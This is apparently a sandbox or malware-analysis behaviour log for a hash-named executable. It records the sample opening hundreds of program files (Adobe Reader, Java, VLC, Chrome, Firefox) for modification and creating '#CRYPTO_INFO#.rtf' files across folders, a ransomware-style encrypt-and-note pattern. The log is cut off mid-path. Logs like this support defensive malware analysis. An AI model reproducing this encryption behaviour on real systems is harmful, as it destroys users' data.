DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\native2ascii.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\orbd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ant-javafx.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\meta-index 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\ktab.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\organize.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\sat_logo_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_dark_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\PushUninstall.jpeg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\calendars.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\es-419_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\redact_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\s_agreement_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nothumbnail_34.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\desktop-tool-view.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 